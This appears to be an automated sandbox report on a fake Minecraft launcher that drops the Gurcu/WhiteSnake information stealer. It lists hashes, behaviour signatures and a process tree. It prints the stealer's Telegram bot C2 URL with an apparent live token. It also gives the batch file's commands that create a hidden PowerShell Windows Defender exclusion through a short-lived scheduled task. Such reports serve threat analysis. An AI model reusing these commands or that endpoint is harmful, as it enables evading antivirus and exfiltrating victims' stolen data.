Analysis

  • max time kernel
    1799s
  • max time network
    1150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-it
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-itlocale:it-itos:windows10-2004-x64systemwindows
  • submitted
    18-10-2024 12:29

General

  • Target

    Apollo_Launcher/start.bat

  • Size

    854B

  • MD5

    0bae63fa7bdef4a22a540c30d19d0419

  • SHA1

    c8948de80bcaf1b661a1f32aea7ba95e2d4ad520

  • SHA256

    179a4e724129787b00bd2aff3e08b0637c9c0fa81fb8bb86cee43020a332ea69

  • SHA512

    79854985b8deff323372c4f5225eaadc49c390c23e3fd4ac4bd838d9636fb281b9c6db0b3d79067c44a43cf29e92999b810a3ca5805891ac527a56df007db63a

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20138.199.29.44%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Apollo_Launcher\start.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2752
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3392
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:3292
      • C:\Windows\system32\schtasks.exe
        schtasks /query /tn "AddDefenderExclusionTask"
        2⤵
          PID:2220
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "AddDefenderExclusionTask" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'" /sc once /st 00:00 /rl highest /f
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1808
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "AddDefenderExclusionTask"
          2⤵
            PID:2300
          • C:\Windows\system32\timeout.exe
            timeout /t 3 /nobreak
            2⤵
            • Delays execution with timeout.exe
            PID:2904
          • C:\Windows\system32\schtasks.exe
            schtasks /delete /tn "AddDefenderExclusionTask" /f
            2⤵
              PID:348
            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
              java -jar Apollo.jar
              2⤵
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4480
              • C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
                C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
                3⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2960
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCB5E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpCB5E.tmp.bat
                  4⤵
                    PID:1272
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              1⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5024

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

              Filesize

              1.7MB

              MD5

              65ccd6ecb99899083d43f7c24eb8f869

              SHA1

              27037a9470cc5ed177c0b6688495f3a51996a023

              SHA256

              aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

              SHA512

              533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

            • C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe

              Filesize

              5.6MB

              MD5

              31946abddd530c1e86f36c191046336b

              SHA1

              b480a8833f684cba353f628c087bf7297a4d4df8

              SHA256

              272a3703b7c4e353638c410008c95503abb90d47b81c5b253773cb0d546e5a0d

              SHA512

              93aeacbb4227b9ae1f731135dc42697fbdadff9c3259ccde9d7b7b4eecfef89c71e3d773df4281cae3d84f81246d6a95da9eaaea85efb949ca33a42f97ead8cb

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_52rodshl.33r.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\tmpCB5E.tmp.bat

              Filesize

              215B

              MD5

              edecc78b2f241e1272f6197fe89b7e9c

              SHA1

              f454966e03384768f142ff452dbf351dc25bdfdf

              SHA256

              03f91fda3049aa1a33f7b680ba0fd7a2df926e878275ef0433be1838f3e884da

              SHA512

              e60e40c598001e122f8988bba13022db987c16a5515280c79e4b2ffcc5b507ff0a399a5273db533ba5ba37d63207af9b027eb7e768745d48499cc9a6fb86a04f

            • C:\Users\Admin\AppData\Roaming\AdminUserCash\CREDIT~1

              Filesize

              116KB

              MD5

              f70aa3fa04f0536280f872ad17973c3d

              SHA1

              50a7b889329a92de1b272d0ecf5fce87395d3123

              SHA256

              8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

              SHA512

              30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

            • memory/2960-121-0x0000024E381C0000-0x0000024E38272000-memory.dmp

              Filesize

              712KB

            • memory/2960-126-0x0000024E38340000-0x0000024E38366000-memory.dmp

              Filesize

              152KB

            • memory/2960-156-0x0000024E383E0000-0x0000024E383F2000-memory.dmp

              Filesize

              72KB

            • memory/2960-127-0x0000024E39260000-0x0000024E3958E000-memory.dmp

              Filesize

              3.2MB

            • memory/2960-125-0x0000024E38380000-0x0000024E383BA000-memory.dmp

              Filesize

              232KB

            • memory/2960-123-0x0000024E1F520000-0x0000024E1F52C000-memory.dmp

              Filesize

              48KB

            • memory/2960-122-0x0000024E382C0000-0x0000024E38310000-memory.dmp

              Filesize

              320KB

            • memory/2960-119-0x0000024E37EB0000-0x0000024E37F1A000-memory.dmp

              Filesize

              424KB

            • memory/2960-118-0x0000024E1F530000-0x0000024E1F54E000-memory.dmp

              Filesize

              120KB

            • memory/2960-109-0x0000024E1D3E0000-0x0000024E1D97A000-memory.dmp

              Filesize

              5.6MB

            • memory/2960-117-0x0000024E1F570000-0x0000024E1F5B0000-memory.dmp

              Filesize

              256KB

            • memory/2960-114-0x0000024E1F560000-0x0000024E1F56A000-memory.dmp

              Filesize

              40KB

            • memory/2960-116-0x0000024E37E30000-0x0000024E37EA6000-memory.dmp

              Filesize

              472KB

            • memory/4480-53-0x000002B3416E0000-0x000002B3416E1000-memory.dmp

              Filesize

              4KB

            • memory/4480-189-0x000002B3416E0000-0x000002B3416E1000-memory.dmp

              Filesize

              4KB

            • memory/4480-87-0x000002B3416E0000-0x000002B3416E1000-memory.dmp

              Filesize

              4KB

            • memory/4480-43-0x000002B3416E0000-0x000002B3416E1000-memory.dmp

              Filesize

              4KB

            • memory/4480-86-0x000002B3416E0000-0x000002B3416E1000-memory.dmp

              Filesize

              4KB

            • memory/5024-14-0x00000199FA040000-0x00000199FA062000-memory.dmp

              Filesize

              136KB

            • memory/5024-3-0x00000199FA0A0000-0x00000199FA122000-memory.dmp

              Filesize

              520KB

            • memory/5024-0-0x00007FFD40483000-0x00007FFD40485000-memory.dmp

              Filesize

              8KB

            • memory/5024-18-0x00007FFD40480000-0x00007FFD40F41000-memory.dmp

              Filesize

              10.8MB

            • memory/5024-15-0x00000199FA340000-0x00000199FA442000-memory.dmp

              Filesize

              1.0MB

            • memory/5024-2-0x00007FFD40480000-0x00007FFD40F41000-memory.dmp

              Filesize

              10.8MB

            • memory/5024-1-0x00007FFD40480000-0x00007FFD40F41000-memory.dmp

              Filesize

              10.8MB

            • memory/5024-13-0x00000199F79B0000-0x00000199F79C0000-memory.dmp

              Filesize

              64KB